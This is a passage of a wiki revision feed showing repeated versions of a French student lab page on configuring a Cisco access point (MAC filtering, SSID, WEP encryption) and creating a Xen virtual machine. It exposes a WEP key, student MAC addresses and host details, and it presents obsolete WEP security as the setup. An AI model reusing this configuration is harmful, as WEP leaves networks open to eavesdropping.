pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&lt;br /&gt;
// on se connecte a notre MV&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage &lt;br /&gt;
apt-systemd&lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22531</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22531"/>
				<updated>2015-10-28T09:33:11Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&lt;br /&gt;
// on se connecte a notre MV&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage &lt;br /&gt;
apt-systemd&lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22526</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22526"/>
				<updated>2015-10-28T09:04:28Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoir  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=ima2a&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22525</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22525"/>
				<updated>2015-10-28T08:59:43Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du Wifi sur l'eeePC &amp;lt;/h5&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22524</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22524"/>
				<updated>2015-10-28T08:47:06Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h5&amp;gt;    1) Configuration du point d’accès Cisco &amp;lt;/h5&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22523</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=22523"/>
				<updated>2015-10-28T08:46:44Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;a) Restriction par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
